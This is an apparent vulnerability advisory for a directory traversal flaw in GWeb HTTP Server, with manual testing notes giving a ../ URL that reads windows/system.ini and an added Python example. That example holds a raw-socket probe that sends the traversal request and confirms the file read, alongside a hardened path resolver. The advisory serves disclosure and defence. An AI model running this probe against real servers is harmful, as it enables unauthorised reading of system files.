GWeb HTTP Server Arbitrary File Access

2004-03-04T07:11:54
ID OSVDB:4136
Type osvdb
Reporter Donato Ferrante(fdonato@autistici.org)
Modified 2004-03-04T07:11:54

Description

Vulnerability Description

GWeb HTTP Server contains a flaw that allows a remote attacker to read files outside the configured web root. The issue is due to GWeb not properly sanitizing the request path: directory traversal sequences (../../) are passed through to the filesystem unchanged, so a path that climbs above the web root is served like any other file. An attacker is able to view and download any file the server process has read access to with a single crafted HTTP request.

Solution Description

There is no known vendor-supplied patch. Donato Ferrante has released an unofficial patch with the original advisory. Please see external reference 'Other Advisory URL' for more information.

Short Description

GWeb HTTP Server fails to sanitize ../ sequences in the request path, allowing a remote attacker to read and download arbitrary files outside the web root.

Manual Testing Notes

http://[victim]/../../../../../../windows/system.ini

The traversal sequences must reach the server verbatim. Most browsers collapse ../ segments in the path before sending the request (RFC 3986 dot-segment removal), so send the probe with a client that writes the path as given (netcat, curl --path-as-is, or a raw socket) and compare the response against a known-good request for a file inside the web root. A 200 response whose body contains the [drivers] or [386Enh] section confirms the read. The system.ini target only applies to a Windows host; on other targets substitute a file that is known to exist above the web root.
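The following is an added example, not code from the original advisory or from GWeb. It shows both halves of the issue described above: a raw-socket probe that sends the manual testing request without any client-side normalisation, and a path resolver of the kind GWeb lacked, which decodes percent-encoding, treats backslashes as separators and confirms the resolved file is still under the web root. The host name, port and web root used here are assumptions.

```python
"""Traversal probe and hardened path resolver for the GWeb-style issue.

Added example; not part of the original advisory or of GWeb. The host,
port and web root values below are assumptions for illustration."""
import os
import socket
from typing import Optional
from urllib.parse import unquote


def build_traversal_request(host: str, depth: int = 6,
                            target: str = "windows/system.ini") -> bytes:
    """Build the raw HTTP/1.0 request from the manual testing notes.

    A browser would collapse the ../ segments before sending, so the probe
    has to be written to the socket verbatim rather than typed into a URL bar."""
    path = "/" + "../" * depth + target
    return f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")


def probe(host: str, port: int = 80, timeout: float = 5.0) -> Optional[bytes]:
    """Send the probe over a plain TCP socket; return the body on a 200, else None.

    This performs a live network call and is not exercised by the offline checks."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_traversal_request(host))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    response = b"".join(chunks)
    head, sep, body = response.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0]
    if sep and status_line.startswith(b"HTTP/1.") and b" 200 " in status_line:
        return body
    return None


def looks_like_system_ini(body: bytes) -> bool:
    """Heuristic confirmation: a Windows system.ini carries these section headers."""
    lowered = body.lower()
    return b"[drivers]" in lowered or b"[386enh]" in lowered


def resolve_web_path(webroot: str, request_path: str) -> Optional[str]:
    """Map a request path to a file under webroot, or return None if it escapes.

    Order matters: percent-decode first (so %2e%2e is seen as ..), normalise
    backslashes (a Windows server treats them as separators), resolve the
    candidate to an absolute path, then check containment with commonpath
    rather than a string prefix, which would accept /srv/www2 for /srv/www."""
    root = os.path.realpath(webroot)
    decoded = unquote(request_path).replace("\\", "/")
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    # Assumed web root for the demonstration; the advisory's own path is rejected.
    demo_root = "/srv/gweb-htdocs"
    for req in ("/index.html", "/../../../../../../windows/system.ini",
                "/%2e%2e/%2e%2e/etc/passwd"):
        print(f"{req!r:50} -> {resolve_web_path(demo_root, req)!r}")
```

The resolver rejects the advisory's path, its percent-encoded and backslash variants, but still serves ordinary paths such as /docs/../index.html that stay inside the root. Use probe() only against a host you are authorised to test.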

References:

Secunia Advisory ID: 11041
Other Advisory URL: http://www.autistici.org/fdonato/advisory/GWebHTTPServer0.6-adv.txt
Keyword: Directory Traversal
ISS X-Force ID: 15381
CVE: CVE-2004-0349
Bugtraq ID: 9742